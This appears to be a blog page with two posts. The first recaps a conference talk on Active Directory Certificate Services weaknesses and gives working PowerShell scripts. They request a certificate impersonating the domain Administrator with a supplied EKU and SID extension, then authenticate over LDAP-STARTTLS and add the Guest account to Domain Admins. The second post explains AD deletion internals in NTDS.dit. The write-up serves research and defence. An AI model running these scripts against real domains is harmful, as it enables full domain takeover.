Last week I presented my session “When your Enterprise PKI becomes one of your enemies” at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans – Thanks to all who attended my session and for all of the follow up questions I got later during the conference and now also on social media and e-mail – I’m very sorry that my two last demos didn’t work, the reason for that was some issues with the CDP in my demo environment the KDC didn’t consider it’s own certificate valid for PKINIT hence the problem.
The first part of the presentation outlined something very common and dangerous that we already see today, Enterprise CA’s trusted for authentication against Active Directory – publishing certificate templates that allow the subject to be supplied in the request (SITR)
But how can you determine if a CA is trusted for authentication against Active Directory? It’s either trusted in NTAuth + Leaf certificates and KDC certificates have their full chain trusted and is valid – this allows for implicit/explicit UPN mapping e.g. the SAN in the certificate matches the userPrincipalName attribute of the user within Active Directory. If the CA is not trusted in NTAuth only explicit mapping is available using the altSecurityIDs attribute + Leaf certificates and KDC certificates have their full chain trusted and is valid.
By default if you install an Enterprise CA using Active Directory Certificate Services (AD CS) – it will be trusted in NTAuth.
Above you can see the requirements to be trusted to authenticate to Active Directory using certificates – Note that Schannel in the S4U2Self scenarios involves the KDC and the authentication part contains to either NTAuth (implicit mapping) or AltSecID (explicit mapping)
The methods with blue color are required to be considered strong according to the Strong Certificate Binding Enforcement (more on that later 1)
Active Directory So let’s have a look how NTAuth – CA’s trusted in NTAuth are stored at the following location ‘CN=NTAuth,CN=Public Key Services,CN=Services,DC=Configuration,DC=X’ in Active Directory and their thumbprint in the multi-valued attribute ‘cACertificate’
Clients On every domain joined computer a copy of all the trusted CA’s in the above attribute are stored in the registry at the following location: ‘HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates’ where one key for each CA is created and named after the thumbprint of the CA certificate.
Group Policy Autoenrollment Client Side Extension (CSE) Supposed to cache the content from AD to the Registry on each domain joined machine within the forest (Including DCs).
So who is validating that the CA is trusted in NTAuth?
Domain Controllers / KDC (if not explicit mapping using AltSecID)
Network Policy Server (NPS)
LDAP-STARTTLS
IIS – SCHANNEL
ADFS – SCHANNEL (Even if explicit mapping exist using AltSecID)
Enrollment of templates that have private key archival enabled
So how is the validation that the CA is trusted in NTAuth performed? If we’re online we’re taking a trip to ‘CN=NTAuth,CN=Public Key Services,CN=Services,DC=Configuration,DC=X’ using LDAP right?
Nope – Verification is done using a API: We’re calling into crypt32.dll?CertVerifyCertificateChainPolicy with the ‘CERT_CHAIN_POLICY_NT_AUTH’ flag
Note: You can test this using PowerShell: Test-Certificate -Cert $cert -Policy NTAUTH
If the certificate chain is valid from Leaf Certificate to the Root CA Certificate and that the full chain is trusted.
Verify that the CA directly above the Leaf Certificate is trusted in NTAuth – this check is done locally by looking in the registry on the client ‘HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates’ – the API never asks Active Directory.
What is Strong Certificate Binding Enforcement? Strong Certificate Binding is a response to CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923 address an elevation of privilege vulnerability that can occur when the Kerberos Key Distribution Center (KDC) is servicing a certificate-based authentication request. Before the May 10, 2022 security update, certificate-based authentication would not account for a dollar sign ($) at the end of a machine name. This allowed related certificates to be emulated (spoofed) in various ways. Additionally, conflicts between User Principal Names (UPN) and sAMAccountName introduced other emulation (spoofing) vulnerabilities that we also address with this security update. More information can be found here: KB5014754: Certificate-based authentication changes on Windows domain controllers and here: Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) | by Oliver Lyak | IFCR
Specifically this protects from the following four scenarios:
dNSHostName/servicePrincipalName computer owner abuse, Remove DNS SPNs from servicePrincipalName, steal DNS hostname of a DC, put it in your computer accounts dNSHostName attr and request a cert, auth with the cert and you’re a DC.
Overwrite userPrincipalName of user to be of target to hijack user account since the missing domain part does not violate an existing UPN
Overwrite userPrincipalName of user to be @ of target to hijack machine account since machine accounts don’t have a UPN
Delete userPrincipalName of user and overwrite sAMAccountName to be without a trailing $ to hijack a machine account
Note: 2-4 would require permissions to write to the ‘userPrincipalName’ attribute
So how is Strong Certificate Binding Enforcement implemented?
As outlined in KB5014754: Certificate-based authentication changes on Windows domain controllers once we’re in Full Enforcement mode there is only 3 ways to stay compliant – otherwise certificate based authentication is going to fail against Active Directory – Full Enforcement mode is planned to February 11, 2025 by default with an option to opt-out until September 10, 2025 by explicit configuring your domain controllers to be in Compatibility Mode. But if you have NOT already by yourself rolled into Enforcement Mode -It means your Active Directory is still vulnerable to those CVEs
Options to be compliant with Strong Certificate Binding Enforcement
Method
Requirements
Certificate Re-issue
Certificate SID Extension
Certificate must contain the ‘1.3.6.1.4.1.311.25.2’ SID Extensions that encodes the user or computers SID hat the certificate issued for/to be used for authentication with
Yes
SAN URL
The SAN of the certificate must contain one entry of the type URL and have a value of “•tag:microsoft.com,2022-09-14:sid:<value>” where <value> is the user or computers SID that the certificate issued for/to be used for authentication with, this is only accepted on the KDC for Windows Server 2025-Windows Server 2019 DCs
Yes
AltSecID
Using the ‘altSecurityIDs’ attribute to strongly map the certificate to the user or computer the certificatre is issued for/to be used for authentication with – only the following mapping methods are considered strong: – X509IssuerSerialNumber “X509:<I>IssuerName<SR>1234567890” -X509SKI “X509:<SKI>123456789abcdef” -X509SHA1PublicKey “X509:<SHA1-PUKEY>123456789abcdef”
No
Supply in the request (SITR) without Client Authentication EKU in the template
One of the requirements for the KDC to accept a certificate for authentication using PKINIT is that the EKU is containing either Client Authentication (1.3.6.1.5.5.7.3.2) or id-pkinit-KPClientAuth (1.3.6.1.5.2.3.4) or Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
Microsoft have a proprietary extension called a Certificate Application Policy and it’s used as an EKU – Defined by this attribute on certificate templates “msPKI-Certificate-Application-Policy Attribute” as this attribute isn’t populated (is empty) on certificate templates that are v1 templates, this attribute can be supplied in the request exactly the same way as we could supply a SAN.
Microsoft issued a statement on this just the day before my presentation on the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans – the statement from MSRC can be foond here: Active Directory Certificate Services Elevation of Privilege Vulnerability – CVE-2024-49019 but it’s not telling you the entire truth about how this works, peer see this has nothing to with if the template is v1 or not, it has to do with and only with if the “msPKI-Certificate-Application-Policy” attribute is populated or not, if you copy a v1 template let’s say you copy the default ‘WebServer’ template, its upgraded and the values in ‘pKIExtendedKeyUsage’ are copied by the ‘Certificate Template’ MMC into ‘msPKI-Certificate-Application-Policy’ and you’re safe – so what is not being told here:
If you have a v2 template let’s say and don’t define EKUs or having msPKI-Certificate-Application-Policy empty – you’re as well subject to having EKUs supplied in the request and this is regardless template version. Is there any real world scenarios for this – well here is an example of a vendor who guides certificate templates to be created this way: Create and Add a Microsoft Certificate Authority Template
Let’s try using this by showing some sample code – For this to work we assume that the default template ‘WebServer’ is published at an Enterprise CA named ‘nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1’ and that it is trusted in NTAuth in a forest with a root domain named nttest.chrisse.com and that the built-in administrator account exists by it’s default name – to utilize this the enrollment permissions needs to be granted either to a user or computer within the forest.
1. WebServer-AppPolicy.ps1
Import-Module-Name CertRequestTools#CA1 IS Trusted in NTAuth$CA1 ="nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"$ApplicationPoliciesExtension =New-Object-ComObject X509Enrollment.CX509ExtensionMSApplicationPolicies$ApplicationPolicyOids =New-Object-ComObject X509Enrollment.CCertificatePolicies.1$ApplicationPolicyOid =New-Object-ComObject X509Enrollment.CObjectId$ApplicationPolicyOid.InitializeFromValue('1.3.6.1.5.5.7.3.2') #Client Authentication EKU$CertificatePolicy =New-Object-ComObject X509Enrollment.CCertificatePolicy$CertificatePolicy.Initialize($ApplicationPolicyOid)$ApplicationPolicyOids.Add($CertificatePolicy)$ApplicationPoliciesExtension.InitializeEncode($ApplicationPolicyOids)$ManagedApplicationPoliciesExtension =[System.Security.Cryptography.X509Certificates.X509Extension]::new($ApplicationPoliciesExtension.ObjectId.Value,`[Convert]::FromBase64String($ApplicationPoliciesExtension.RawData(1)), $ApplicationPoliciesExtension.Critical)New-PrivateKey-RsaKeySize 2048-KeyName ([Guid]::NewGuid()) |New-CertificateRequest-Subject "CN=DEMO1"`-UserPrincipalName administrator@nttest.chrisse.com `-OtherExtension $ManagedApplicationPoliciesExtension |`Submit-CertificateRequest-ConfigString $CA1 -Template WebServer |`Install-Certificate-Name My -Location CurrentUser
So now we have a certificate with the UPN of the built-in administrator (RID 500) and we supplied the required Client Authentication EKU in the request using the ‘Web Server’ template so our certificate with the subject “CN=DEMO1” should be able to authenticate and become the Administrator account RID500. To do this we use another script to perform LDAP-STARTTLS – select the certificate issued by the previous script when prompted: Note: Change the domain controller from ‘nttest-dc-01.nttest.chrisse.com’ to your own DC, the KDC on the must be capable of performing PKINIT e.g. have valid KDC certificate.
LDAP-TLSv2.ps1
Add-Type-AssemblyName System.DirectoryServices.ProtocolsAdd-Type-AssemblyName System.Security# Change the domain controller to your own DC instead of 'nttest-dc-01.nttest.chrisse.com'$Id =New-Object-TypeName System.DirectoryServices.Protocols.LdapDirectoryIdentifier -ArgumentList 'nttest-dc-01.nttest.chrisse.com',389,$true,$false$Ldap =New-Object-TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $Id,$null, ([System.DirectoryServices.Protocols.AuthType]::External)$Ldap.AutoBind =$false"Certificate selection"|Write-Host$Location = [System.Security.Cryptography.X509Certificates.StoreLocation]::CurrentUser$Name = [System.Security.Cryptography.X509Certificates.StoreName]::My$Store =New-Object-TypeName System.Security.Cryptography.X509Certificates.X509Store -ArgumentList $Name, $Location$Store.Open("ReadOnly, MaxAllowed, OpenExistingOnly")$Cert = [System.Security.Cryptography.X509Certificates.X509Certificate2UI]::SelectFromCollection($Store.Certificates.Find("FindByKeyUsage",0xa0,$true).Find("FindByExtension","2.5.29.35",$true),"Certificate selection","Select a certificate","SingleSelection")$Store.Dispose()$Ldap.ClientCertificates.Clear()[void]$Ldap.ClientCertificates.Add($Cert[0])$Ldap.SessionOptions.QueryClientCertificate = {param( [System.DirectoryServices.Protocols.LdapConnection] $Connection, [Byte[][]] $TrustedCAs )return $Cert[0]}"Starting TLS"|Write-Host$Ldap.SessionOptions.StartTransportLayerSecurity($null)$RootDseSearchRequest =New-Object-TypeName System.DirectoryServices.Protocols.SearchRequest -ArgumentList '',"(&(objectClass=*))","Base"Try{ $RootDseSearchResponse =$null $RootDseSearchResponse = $Ldap.SendRequest($RootDseSearchRequest)}Catch{ $Ldap.Dispose()throw$_}"Default naming context: {0}"-f $RootDseSearchResponse.Entries[0].Attributes["defaultNamingContext"].GetValues([String])"Binding"|Write-HostTry{ $Ldap.Bind()}Catch{throw}# Send an Extended WHOAMI request$ExtReq =New-Object-TypeName System.DirectoryServices.Protocols.ExtendedRequest -ArgumentList "1.3.6.1.4.1.4203.1.11.3"$ExtRes = [System.DirectoryServices.Protocols.ExtendedResponse] $Ldap.SendRequest($ExtReq)"Bound as identity: '{0}'"-f [System.Text.Encoding]::UTF8.GetString($ExtRes.ResponseValue)# Change to a user you want to add to domain admins $UserDN ="CN=Guest,CN=Users,DC=nttest,DC=chrisse,DC=com""Adding '{0}' to Domain Admins"-f $UserDN$Modify = [System.DirectoryServices.Protocols.ModifyRequest]::new("CN=Domain Admins,CN=Users,DC=nttest,DC=chrisse,DC=com","Add","member", $UserDN)Try{ $Response = $Ldap.SendRequest($Modify)}Catch{ $Response =$_.Exception.GetBaseException().Response}"Result: {0}"-f $Response.ResultCode$Ldap.Dispose()
Supply in the request (SITR) with Strong Certificate Binding Enforcement
If we now enable Strong Certificate Binding Enforcement on our KDCs / Domain Controllers by setting/creating the following registry key: “HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement” as type DWORD and set the value to “2” – Strong Certificate Binding Enforcement is now enabled
We can verify this by trying to authenticate with the certificate already issued above, with the subject CN=DEMO1 – simply run LDAP-STARTTLS – select the certificate issued by the previous script when prompted.
This time the authentication should fail, this is expected as the certificate would not be compliant with Strong Certificate Binding Enforcement, It doesn’t contain the SID extension, neither a SAN with the SID or are being explicit mapped in the altSecID attribute.
So this means that once we reach Strong Certificate Binding Enforcement on all our KDCs / Domain Controllers we’re safe from this supply in the request madness right? Absolutely NOT. Because what if the SID extension could also be supplied in the request?
Let’s issue a certificate once again using the same template ‘WebServer’ but supply a SID as well.
2. WebServer-AppPolicySCBE.ps1
Import-Module-Name CertRequestTools#CA1 IS Trusted in NTAuth$CA1 ="nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"# Insert the SID as szOID_NTDS_CA_SECURITY_EXT certificate extension$SidExtension =New-SidExtension-NTAccount NTTEST\Administrator$ApplicationPoliciesExtension =New-Object-ComObject X509Enrollment.CX509ExtensionMSApplicationPolicies$ApplicationPolicyOids =New-Object-ComObject X509Enrollment.CCertificatePolicies.1$ApplicationPolicyOid =New-Object-ComObject X509Enrollment.CObjectId$ApplicationPolicyOid.InitializeFromValue('1.3.6.1.5.5.7.3.2') #Client Authentication EKU$CertificatePolicy =New-Object-ComObject X509Enrollment.CCertificatePolicy$CertificatePolicy.Initialize($ApplicationPolicyOid)$ApplicationPolicyOids.Add($CertificatePolicy)$ApplicationPoliciesExtension.InitializeEncode($ApplicationPolicyOids)$ManagedApplicationPoliciesExtension =[System.Security.Cryptography.X509Certificates.X509Extension]::new($ApplicationPoliciesExtension.ObjectId.Value,`[Convert]::FromBase64String($ApplicationPoliciesExtension.RawData(1)), $ApplicationPoliciesExtension.Critical)New-PrivateKey-RsaKeySize 2048-KeyName ([Guid]::NewGuid()) |`New-CertificateRequest-Subject "CN=DEMO2"`-UserPrincipalName administrator@nttest.chrisse.com `-OtherExtension $SidExtension,$ManagedApplicationPoliciesExtension |`Submit-CertificateRequest-ConfigString $CA1 -Template WebServer |`Install-Certificate-Name My -Location CurrentUser
Now you should have a issued certificate with the subject “CN=DEMO2” – Now use the LDAP-STARTTLS script again to authenticate using the new certificate, make sure you select the right certificate, if you want to be sure you can just open certmgr.msc and delete “CN=DEMO1”
You should now have been authenticated and the KDC / Domain Controller is in Strong Certificate Binding Enforcement mode.
To wrap up this first blog post that is an attempt to cover what is presented in the first part of my session “When your Enterprise PKI becomes one of your enemies” at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans last week there is some key take aways.
“Strong Certificate Binding Enforcement” will not help you with bad certificate template hygien at all it was designed to prevent CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923.
Certificate Templates without the ‘msPKI-Certificate-Application-Policy’ is subject to EKUs being supplied in the request regardless of template version.
Equally – Certificate Templates with at least one EKU in ‘msPKI-Certificate-Application-Policy’ is protected. (You can patch the default v1 ‘WebServer’ if you want) – I’m not in any way recommending to use v1 templates .
Next part will look into how all this can be mitigated by choosing the right design and how templates can be optimally configured – but after that I’m going to cover some of the real bad scenarios.
How deletion/removal of data really works in Active Directory This is the fourth post in a series of articles that will describe what’s really inside NTDS.dit and how Active Directory works on the database layer, the past three articles has been about:
Explains the tables within NTDS.dit in detail as far as what they are used for, in which release of Active Directory (Windows Server) they were introduced in, as well any major changes being added in later versions: How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 1
Explains how the object tree hierarchy is maintained at the database layer and the concept of DNTs and PDNTs and how they make up the relation between parent and descendent objects: How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 2
Explains the “Ancestors_col” that supports subtree searches and the security propagation (SDProp) – Part 3
This blog article will not cover the following scenarios:
Deletions of DSAs (Domain Controllers) cause it involves SAM and NETLOGON
The Foreign-Security-Principal Cleanup task – as it cleans and removes duplicate SIDs that only can end up in your directory in very rare scenarios and involves SAM – to – AD Upgrades.
This blog article wouldn’t have been possible without:
The ESEDump utility that I’ve developed together with my very good friend Stanimir Stoyanov – His contribution to the code has been invaluable.
Countless of sleepless nights and the support from my team at Enfo Zipper.
What you need as a prerequisites before reading this blog article:
Basic understanding of Active Directory at the database layer, that can be found at this blog:
Basic understanding of deletions in Active Directory
When an object is deleted in Active Directory (this is referred to as a logical deletion), the object is not immediately removed from Active Directory, and instead the object is flagged/marked for deletion by defining two or three attributes on the object depending on if the Active Directory feature “Recycle-Bin” is enabled and if there is Windows Server 2008 R2 or later DSAs that host a writeable instance of the object – see ‘Table 1.’
There are a few exceptions where deletions are trying to be physically deleted immediately (the row representing the object is being deleted from the database) without ever transit to the intermediate state of being a tombstone, deleted object or recycled object:
Dynamic-Objects, object that have the auxiliary class dynamic-Object present – those are physically removed once their time-to-live has passed; eventually they remain as phantom’s in the database until all references pointing towards them have been cleared.
Placeholder object’s that are in the distribution NTDS.dit – Deleted by DCPROMO.
A read-only naming context (NC) is being removed from a replica (e.g. a Global Catalog (GC) demotion)
Removal of lingering objects – using the operational attribute ‘removeLingeringObject’: http://msdn.microsoft.com/en-us/library/cc223303(v=prot.10).
Removal of an object as a result of being cross-domain moved.
Table 1: Logical deletion sets the following attributes
Attributes
Recycle Bin State
Minimum DSAs Versions Present
IsDeleted lastKnownParent
Off
Windows 2000 Server (All versions) Windows Server 2008 (All versions) Windows Server 2008 R2 – Read Only DC** Windows Server 2012 – Read Only DC**
** Originated deletions on a RODC such as “Connection Objects” that is writable 0x4 has “isRecycled” as well.
IsDeleted IsRecycled lastKnownParent
Off
Windows Server 2008 R2 (All versions) – Writable DC Windows Server 2012 (All versions) – Writable DC
IsDeleted lastKnownParent msDS-LastKnownRDN
On
Windows Server 2008 R2 (All versions)
Windows Server 2012 (All versions)
Once objects are being logically deleted and transformed into tombstones, they lose most of their attributes – unless the Recycle Bin is enabled (and is as a result of a logical deletion being transformed into a “deleted object” rather than a tombstone).
The following attributes are always preserved (during a logical delete, regardless the state of the Recycle Bin) until the object (row in the database) is either
Physically deleted – (The object isn’t referenced by any other object within the database) the row representing the object can now safely be deleted.
The object (row) remains represented as a phantom to satisfy reference integrity (e.g. there is other objects (rows) in the database that reference the object and prevent the row from being physically deleted). Please see Phantoms and reference integrity below.
Additionally the attribute that serves as the RDN of the object being logically deleted is also always preserved. (E.g. CN/O/OU/DC)
Attributes that in the schema are defined to be preserved on deletion by having their searchFlags attribute containing bit 8 (0x00000008 = fPRESERVEONDELETE) are also preserved during a logical delete, unless they are linked attributes or a constructed attribute that drives it’s data from an attribute that is also not preserved.
Linked attributes are removed (Both forward links and backlinks) on logical deletions unless if the Recycle-Bin is enabled, then the links are deactivated instead.
To view deactivated links if the Recycle-Bin is enabled above the database layer, the following control can be used:
Table 2: LDAP controls to make deactivated links visible to LDAP
Control Name
Visible when control present
LDAP_SERVER_SHOW_DEACTIVATED_LINK_OID
Link values referring to deleted-objects
Note: See ‘The removal of linked attribute values’ – below for the behavior of removing a link value rather than a link value being removed as a part of a logical deletion.
The following attributes will always be removed (during a logical delete) regardless of searchFlags (0x00000008 = Preserve on delete) and regardless of the Recycle Bin state.
During re-animation or undelete (if not supplied by the end-user) the objectCategory are driven back and set to the objectCategory of the objects most specific ObjectClass.
If the object is a user, this is computed back to its original state by using the userAccountControls attribute.
If the object is a group, this is computed back to its original state by using the groupType attribute.
Logical Deletion introduces the following internal columns to the database (NTDS.dit)
The following ‘internal’ columns (those are internal to the DSA only and are not real attributes) in addition with the attributes set in Table 1: ‘Logical deletion sets the following attributes’ represents the support on the database level for logical deletions of objects.
Table 3: datatable – Simplified for logical deletion
The ‘time_col’ is the column that holds the time of when an object was converted into a tombstone or deleted object.
‘time_col’ is not accessible through any external interfaces such as (LDAP, ADSI) – However the metadata for the attribute ‘isDeleted’ should have a ‘Org.Time/Date’ that matches the value stored in the ‘time_col’ column.
The ‘recycle_time_col’ is the column that holds the time of when an object was logically deleted or if the Recycle-Bin is enabled converted into a recycled object.
‘recyle_time_col’ is not accessible through any external interfaces such as (LDAP, ADSI) – However the metadata for the attribute ‘isRecycled’ should have a ‘Org.Time/Date’ that matches the value stored in the ‘recyle_time_col’ column.
Note: Only present in Windows Server 2008 R2 databases and later
Sample NTDS.dit representing the state of a logically deleted object:
Once the deleted objects life time (DOL) has passed since the object was logically deleted, ‘recycle_time_col’ and ‘isRecycled’ will be set. See ‘Deleted objects lifetime and deleted objects’ below for more information.
Originating logical deletion constraints
The object has to reside in a writable naming context (NC) on the DSA where the logical deletion originates.
If the object being deleted has the following characteristics within the Security Descriptor:
More exactly when the Sbz1 field has the value of 0x1 and the Control (RM control) field has the value (SECURITY_PRIVATE_OBJECT bit) of 0x1 and when deleting an object that resides within the schema naming context (NC) or the configuration naming context (NC) the following conditions have to be meet:
The Domain Controller (DC) (where the originated delete is taking place) must be a member of the root domain in the forest, or
The Domain Controller (DC) (where the originated delete is taking place) must be a member of the same domain where the current object owner belongs.
If the FLAG_DISALLOW_DELETE bit is set in the ‘systemFlags’ attribute of the object being deleted, the delete is being rejected by the DSA.
If the object being deleted is a tombstone e.g. has the ‘isDeleted’ attribute set to True and the Recycle Bin isn’t enabled, the delete is being rejected by the DSA.
If the object being deleted is recycled e.g. has the ‘isRecycled’ attribute se to True and the Recycle Bin is enabled, the delete is being rejected by the DSA.
If the object being deleted has descendants/child objects, the delete operation is being rejected by the DSA unless the requester has passed the LDAP_SERVER_TREE_DELETE_OID control. The following constraints applies to Tree-Deletes as well:
The requester must have the RIGHT_DS_DELETE_TREE on the object being deleted. Note that no additional permissions are required on the descendants of the object.
The tree-delete operation cannot be applied to a naming context (NC) root.
Objects with the ‘isCriticalSystemObject’ attribute equal to true and which is not Security Account Manager (SAM) specific objects cannot be deleted by the tree-delete operation. This constraint is checked object-by-object, and deletion stops at the first deletion attempt that violates the constraint. If deletion stops, the resultant tree might not be the same as the original tree because some objects might have been deleted prior to the failure.
If the object being deleted resides within the schema naming context (NC) and the “Schema Devil” hasn’t been invoked, the delete is being rejected by the DSA.
If the object being deleted is the DC’s nTDSDSA object (representing the DSA where the delete operation is taking place) or any of its ancestors, the delete is being rejected by the DSA.
If the object being deleted is a crossRef object corresponding to the DC’s (The DSA where the delete operation is taking place) configuration, schema, or default domain naming contexts (NCs), the delete is being rejected by the DSA.
If the object being deleted is protected, the delete is being rejected by the DSA.
If the delete operation would require delayed link processing or link clean up (please see the section below: The link cleaner and the delayed link processing mechanism) and such processing is already taking place on the object that is about the be deleted, the DSA may or may not proceed with the requested delete operation depending on the following:
The DSA is running Windows Server 2008 R2 or later and are subject to “Delayed Link Processing” and the object being deleted is already being processed by the “Delayed Link Processing” mechanism in a such way that the current processing can’t be merged with the requested operation (To remove forward or backward links associated with the object being deleted) – that is if:
The ongoing link processing is performing any of the following operations:
Processing Physical Link Deletions (Can be merged with the delete operation if the Recycle-Bin is absent, otherwise the delete is being rejected by the DSA)
Processing Logical Link Deletions (Can be merged with the delete operation if the Recycle-Bin is present, otherwise the delete is being rejected by the DSA)
Processing Logical Link Un-Deletions (Can’t be merged with the delete operation, the delete is being rejected by the DSA)
Processing/Touching MetaData for groupType change (Can’t be merged with the delete operation, otherwise the delete is being rejected by the DSA)
If the current operation implicit force processing on a specific attribute, a merge can only take place if the requested operation is about to perform processing on the same attribute, otherwise the delete is being rejected by the DSA.
If the current operation implicit force processing bound by a specific update sequence (USN), a merge can only take place if the requested operation is about to perform processing bound to the same USN, otherwise the delete is being rejected by the DSA.
The DSA is running Windows Server 2003 or Windows Server 2008 and are therefore subject to “Link Cleaner” – However the Link Cleaner has the ability for any object being processed to determine the required work to perform by the objects current state (instead of from a work list), that is if the delete operation requires processing (To remove forward or backward links associated with the object being deleted) – and the object already is under link cleanup, the current link cleanup task will pick up the requirement just made by the delete operation.
The Deleted Objects (DO) containers
When an object is logically deleted, they are eventually moved into something referred to as the “Deleted Objects Container” (DO container) – Each and every naming context (NC) in Active Directory has by default a deleted objects container except the Schema naming context (NC).
The deleted objects container(s) are not visible to ADSI or LDAP by default- However they can be made visible to LDAP by specifying a server control. (The deleted objects container(s) are marked as deleted themselves by having the “isDeleted” attribute set to: True) and are therefore by default invisible as any other deleted object.
The following controls make the deleted objects container(s), the deleted objects and eventually recycled objects visible.
Table 4: LDAP controls to make tombstones, deleted objects and recycled objects visible to LDAP
Control Name
Visible when control present
LDAP_SERVER_SHOW_DELETED_OID
Tombstones and Deleted Objects
LDAP_SERVER_SHOW_RECYCLED_OID
Tombstones, Deleted Objects and Recycled Objects
The deleted objects container(s) are referenced as well-known objects on each naming context (NC) head they belong to by the “wellKnownObjects” attribute, the reference is stored with the syntax binary distinguished name (Binary-DN) where the DN portion must be the DN of the deleted objects container ex: “CN=Deleted Objects,CN=Configuration,DC=X” and the binary portion must contain a well-known GUID (identifying that the DN represent a deleted objects container) “18E2EA80684F11D2B9AA00C04F79F805” if no such entry is present in the “wellKnownObjects” attribute on the naming context (NC) head the NC is considered to not having a deleted objects container.
Logically deleted objects are moved into the “Deleted Objects” container except in the following cases:
There is no “Deleted Objects” container in the NC the object resides in
The object has the SystemFlags bit: FLAG_DISALLOW_MOVE_ON_DELETE
The object is a naming context (NC) head.
The object is being removed as a part of the removal of an entire read-only naming context (NC)
If the object can’t for some reason be moved into a deleted objects container, the object is deleted anyway (The attributes in Table 1: ‘Logical deletion sets the following attributes’ are still set) but without being moved, additionally objects that are immediately physically deleted (e.g. objects that never transit to the phases of tombstones, deleted objects or recycled objects, such as dynamic objects for example) are never moved into a deleted objects container.
The Deleted Objects (DO) containers implements the following semantics to the database (NTDS.dit)
Note: ‘time_col’ is set to “9999-12-29 23:59:59” – pretty far from now right? As mentioned above the ‘Deleted Objects’ container(s) them self are having ‘isDeleted’ true making them invisible to LDAP except when the LDAP_SERVER_SHOW_DELETED_OID control is passed – this comes with another problem. What prevents the ‘Deleted Objects’ container(s) from being garbage collected? Well they are on the index and appear as a deleted object, it’s just that it won’t happen until “9999-12-29 23:59:59”
I did a test and actually changed this to something (not that far) away in time:
Name mangling for deletion
When an object is logically deleted, they are eventually relative distinguished name (RDN) mangled for deletion – that is to enforce an unique relative distinguished name (RDN) when and if the object is being moved into the deleted objects container (Please see the: ‘The Deleted Objects (DO) containers’ above for constraints when the object moves)
An relative distinguished name (RDN) is mangled for deletion as follows: <RDN>0x0ADEL:<GUID> Note: The <RDN> might be truncated to ensure the whole new RDN isn’t larger than 255 characters. Sample: “CN=Christoffer Andersson\0ADEL:1e5f5da7-af10-4d69-9c06-491c79659116”
If the Recycle-Bin is enabled, the original relative distinguished name (RDN) is stored in the msDs-LastKnownRDN before it’s mangled for deletion.
Logically deleted objects are relative distinguished name (RDN) mangled except the following cases:
The object is a naming context (NC) head.
The object is being removed as a part of the removal of an entire read-only naming context (NC).
Objects that are immediately physically deleted (e.g. objects that never transit to the phases of tombstones, deleted objects or recycled objects, such as dynamic objects for example) – don’t have their names mangled for deletions either.
The removal of linked attribute values
Prior to Windows Server 2003 and Linked Value Replication (LVR) – Linked values where removed instantly from the ‘link_table’ on each DSA.
Linked value replication (LVR) allows individual values of a multivalued attribute to be replicated separately. In Windows 2000 Server, when a change was made to a member of a group (one example of a multivalued attribute with linked values) the entire group had to be replicated including all linked values. With linked value replication (LVR), only the group member that has changed is replicated, and not the entire group. Linked valued replication (LVR) was introduced in Windows Server 2003 and requires all DSAs in the forest to run at least Windows Server 2003 and the forest functional level (FFL) to be Windows Server 2003 or later, other than those requirements linked value replication requires replication metadata peer value in addition to replication metadata peer attribute to track changed values.
Starting with linked value replication (LVR) the state of a deleted (ABSENT) value has to be replicated and received by all DSAs within the tombstone lifetime (TSL) just like logically deleted objects – after that a value has been deleted (marked as ABSENT) it will be garbage collected and physically removed once a tombstone lifetime (TSL) has elapsed since the date if the delete – Please see ‘Tombstones and tombstone lifetime’ and ‘The Garbage collector process’ below for more information.
The following events are logged if an ABSENT linked value is garbage collected (physically deleted from the database):
Table 5: ABSENT Linked Value being Garbage Collected
Event ID
Source
Category
Description
1697
ActiveDirectory_DomainService
Garbage Collection
Internal event: Active Directory Domain Services removed the following expired, deleted attribute value from the following object.
The ‘link_deltime’ column is the column that holds the time of when a linked value was made ‘ASBENT’ and marked for deletion.
‘link_deltime’ is not accessible through any external interfaces such as (LDAP, ADSI) – However the value property metadata for the value should have a ‘Last Org.Time/Date’ that matches the value stored in the ‘link_deltime’ column.
Note: Only present in Windows Server 2003 databases and later
The ‘link_ncdnt’ column was added to support linked value replication (LVR) – as linked attribute values are being replicated, there needs to be a way to determine the naming context (NC) they belong to (replication is always performed peer naming context)
Note: Only present in Windows Server 2003 databases and later
Let’s have a look at the ‘link_table’ in NTDS.dit with link values representing the LEGACY, PRESENT and ABSENT states:
The link cleaner and the delayed link processing mechanism
The link cleaner (Present in Windows Server 2003 and later) and the delayed link processing (Present in Windows Server 2008 R2 and later) are mechanisms that continue operations regarding links on objects that needs and have been marked for “cleaning”, objects needs “cleaning” when more than a maximum numbers of links have to change state (only the maximum limit of links are going to change to its desired new state in the original transaction) the remaining links are going to be processed (in batches of the maximum limit in their own transactions) by either the link cleaner or the delayed link processing mechanism that runs as an scheduled task.
The reason for that only a maximum (limit) of links can change state in a single transaction is to avoid ESE version store limits (e.g. the numbers of changes that can be held in the ‘copy buffer’ and commit in a single transaction to the NTDS.dit database) – therefor the remaining links over the maximum limit has to be processed in separate transactions, hence the link cleaner and the delayed link processing mechanism.
The link cleaner was introduced in Windows Server 2003 – the issue was introduced/become more critical with the capability of Linked Value Replication (LVR) that allows a linked attribute to store more than 5000 linked values.
Table 7: Background processing of linked values
Mechanism
DSAs Version
Maximum links in one transaction
Initialized
Re-Scheduled
Triggers
Maximum Run Time
Link Cleaner
Windows Server 2003 Windows Server 2003 R2 Windows Server 2008
1000
30 minutes after boot
Every 12 hours
60 seconds after that an object has been marked for cleaning
The task runs for maximum of 5 minutes until it reschedule itself:
If there is more work to do: immediately rescheduled.
If trigged by cleaning don’t reschedule
If the re occurring task, reschedule within 12 hours
Note: The Link Cleaner takes the above action as well if it has processed more than: 1000000 links
Delayed Link Processing
Windows Server 2008 R2 Windows Server 2012
10000
30 minutes after boot
